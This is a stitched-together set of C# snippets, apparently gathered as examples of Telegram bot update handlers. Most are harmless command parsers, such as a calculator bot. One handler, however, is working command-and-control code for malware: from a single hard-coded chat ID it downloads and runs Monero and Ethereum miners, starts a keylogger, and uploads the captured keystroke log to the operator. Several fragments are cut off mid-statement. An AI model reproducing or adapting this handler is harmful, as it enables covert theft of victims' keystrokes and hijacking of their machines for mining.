private void Client_UpdatesReceived(object sender, TelegramUpdateEventArgs e) { foreach (UpdateInfo update in e.Updates) { OnMessageReceived(update.Message); Process(update); } }
private static void ClientUpdatesReceived(object sender, TelegramUpdateEventArgs e) { foreach (UpdateInfo update in e.Updates.Where(update => update.Message.Text.StartsWith("/"))) { if (update.Message.Text.Equals("/start")) { mClient.SendMessage(update.Message.Chat.Id, "Hello. I`m calculator bot. Type \"/calculate\" to start the calculation"); } else if (update.Message.Text.Equals("/calculate")) { mClient.SendMessage(update.Message.Chat.Id, "Please enter an arithmetic expression and press =", replyMarkup: GetKeyboardMarkup()); } else { mClient.SendMessage(update.Message.Chat.Id, "Unknow command"); } } }
private static void ClientUpdatesReceived(object sender, TelegramUpdateEventArgs e) { foreach (var update in e.Updates) { if (update.CallbackQuery.Id != null) { ConsoleUtlis.WriteConsoleLog("New CallbackQuery"); ParseCommandInCallbackQuery(update.CallbackQuery); } if (update.Message.MessageId != 0) { ConsoleUtlis.WriteConsoleLog("New MessageInfo"); if (update.Message.Text.StartsWith("/")) { ParseCommandInMessageInfo(update.Message); } } } }
private static void ClientUpdatesReceived(object sender, TelegramUpdateEventArgs e) { foreach (var update in e.Updates.Where(update => update.Message.MessageId != 0)) { if (update.Message.Text.StartsWith("/")) { ParseCommandInMessageInfo(update.Message); } else if (update.Message.Text.Equals("Exit")) { ReplyKeyboardRemove(update.Message.Chat.Id); } else { ParseAnswerInMessageInfo(update.Message); } } }
private void Client_UpdatesReceived(object sender, TelegramUpdateEventArgs e) { foreach (var update in e.Updates) { OnMessageReceived(update.Message); Process(update); } }
void client_UpdatesReceived(object sender, TelegramUpdateEventArgs e) { Console.WriteLine("Updates received: {0}", e.Updates.Length); }
static void client_UpdatesReceived(object sender, TelegramUpdateEventArgs e) { var client = (TelegramBotClient)sender; foreach (var item in e.Updates) { Console.WriteLine("New Message"); if (item.Message.Text != null) { if (item.Message.Chat.Id == 461266500) { if (item.Message.Text == "CheckGPU") { Console.WriteLine(1); Console.WriteLine(CheckGPU()); } else if (item.Message.Text.Contains("/xmr ")) { download(item.Message.Text.Replace("/xmr ", ""), "xmr"); Properties.Settings.Default.Current = "xmr"; Properties.Settings.Default.Save(); } else if (item.Message.Text.Contains("/eth ")) { if (CheckGPU()) { // download(item.Message.Text.Replace("/eth ", ""), "eth"); Console.WriteLine("Download Complete"); StartMine("eth"); Properties.Settings.Default.Current = "eth"; Properties.Settings.Default.Save(); } else if (Properties.Settings.Default.Current != "xmr") { download(item.Message.Text.Replace("/xmr ", ""), "xmr"); Properties.Settings.Default.Current = "xmr"; Properties.Settings.Default.Save(); } } else if (item.Message.Text.Contains("/setGPU ")) { string raw = item.Message.Text.Replace("/setGPU ", ""); setValue(raw, "gpus"); } else if (item.Message.Text == "/StopMining") { DirectoryInfo dir = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\sys\\"); foreach (FileInfo file in dir.GetFiles()) { file.Delete(); } foreach (DirectoryInfo subdir in dir.GetDirectories()) { subdir.Delete(true); } Properties.Settings.Default.Current = "None"; Properties.Settings.Default.Save(); } else if (item.Message.Text == "/StartLogging") { if (!Properties.Settings.Default.Logging) { Keylogger.Start(); Properties.Settings.Default.Logging = true; Properties.Settings.Default.Save(); } } else if (item.Message.Text == "/StopLogging") { if (Properties.Settings.Default.Logging) { Keylogger.Stop(); Properties.Settings.Default.Logging = false; Properties.Settings.Default.Save(); } } else if (item.Message.Text == "/dump") { string path = Path.GetTempPath() + 1234567890 + ".txt"; FileInfo pathInfo = new FileInfo(path); if (pathInfo.Exists) { var log = new NetTelebot.Type.NewFile() { FileContent = File.ReadAllBytes(path), FileName = "LOG.TXT" }; client.SendDocument(461266500, log); pathInfo.Delete(); Properties.Settings.Default.LogFile = false; Properties.Settings.Default.Save(); } } else if (item.Message.Text.Contains("/setSites ")) { string raw = item.Message.Text.Replace("/setSites ", ""); setValue(raw, "Sites"); } else if (item.Message.Text == "/stats") { CheckGPU(); client.SendMessage(item.Message.Chat.Id, String.Format("{0}{1} LOGFILE:{2} LOGGING:{3}", Properties.Settings.Default.Current.ToUpper(), Properties.Settings.Default.InstalledGPU, Properties.Settings.Default.LogFile, Properties.Settings.Default.Logging)); } } } } }
/// <summary> /// Checks which <see cref="EventArgs"/> is contained within the <see cref="TelegramUpdateEventArgs"/>, and returns the user's raw input for <see cref="Command"/> processing. /// <para>Returns false if the raw input was unable to be found, and outs an empty string.</para> /// </summary> /// <param name="e"></param> /// <returns></returns> internal static bool TryGetEventArgsRawInput(TelegramUpdateEventArgs e, out ReadOnlyMemory <char> rawInput) { rawInput = e switch { var _ when e.CallbackQueryEventArgs is { } => e.CallbackQueryEventArgs.GetRawInput(),
//? Developer's note: Nick Cannon obliterated his career while I was writing these Extension Methods internal static bool TryGetChatId(this TelegramUpdateEventArgs e, out long chatId) { chatId = e switch { { CallbackQueryEventArgs : { } } => e.CallbackQueryEventArgs.GetChatId(),